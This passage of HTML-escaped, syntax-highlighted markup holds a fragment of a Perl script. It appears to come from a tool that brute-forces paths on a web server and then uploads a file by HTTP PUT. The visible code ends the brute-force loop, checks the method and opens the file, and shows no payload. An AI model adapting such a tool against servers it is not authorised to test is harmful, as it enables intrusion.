class="pun" style="color: rgb(205, 232, 177) !important;"&gt;,&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;$bpath&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;);&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;}&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="com" style="color: rgb(233, 195, 239) !important;"&gt;#end of brute force&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="kwd" style="color: rgb(205, 234, 173) !important;"&gt;print&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &lt;/span&gt;&lt;span class="str" style="color: rgb(233, 195, 239) !important;"&gt;"-"&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; x &lt;/span&gt;&lt;span class="lit" style="color: rgb(234, 222, 173) !important;"&gt;60&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;.&lt;/span&gt;&lt;span class="str" style="color: rgb(233, 195, 239) !important;"&gt;"n"&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;;&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="kwd" style="color: rgb(205, 234, 173) !important;"&gt;if&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;(&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;$httpmethod eq &lt;/span&gt;&lt;span class="str" style="color: rgb(233, 195, 239) !important;"&gt;"PUT"&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;)&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;{&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&amp;nbsp; &lt;/span&gt;&lt;span class="kwd" style="color: rgb(205, 234, 173) !important;"&gt;my&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; $content&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;;&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&amp;nbsp; &lt;/span&gt;&lt;span class="kwd" style="color: rgb(205, 234, 173) !important;"&gt;my&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; $data&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;;&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&amp;nbsp; &lt;/span&gt;&lt;span class="com" style="color: rgb(233, 195, 239) !important;"&gt;#cacl file size&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&amp;nbsp; $filesize &lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;=&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;-&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;s $file&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;;&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&amp;nbsp; &lt;/span&gt;&lt;span class="kwd" style="color: rgb(205, 234, 173) !important;"&gt;print&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &lt;/span&gt;&lt;span class="str" style="color: rgb(233, 195, 239) !important;"&gt;"$file size is $filesize bytesn"&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;;&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&amp;nbsp; open&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;(&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;INFO&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;,&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; $file&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;)&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;||&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &lt;/span&gt;&lt;span class="kwd" style="color: rgb(205, 234, 173) !important;"&gt;die&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;(&lt;/sp
